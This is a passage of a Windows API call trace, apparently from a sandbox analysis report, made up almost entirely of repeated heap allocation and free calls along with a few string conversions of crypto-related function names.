lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.567] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a10) returned 0x955018 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.567] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.568] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.568] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a10) returned 0x955018 [0035.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0035.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a10) returned 0x95c448 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.569] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.569] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0035.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.570] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2b8 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.570] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0035.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.571] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.572] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0035.573] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0035.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.573] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.573] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.575] 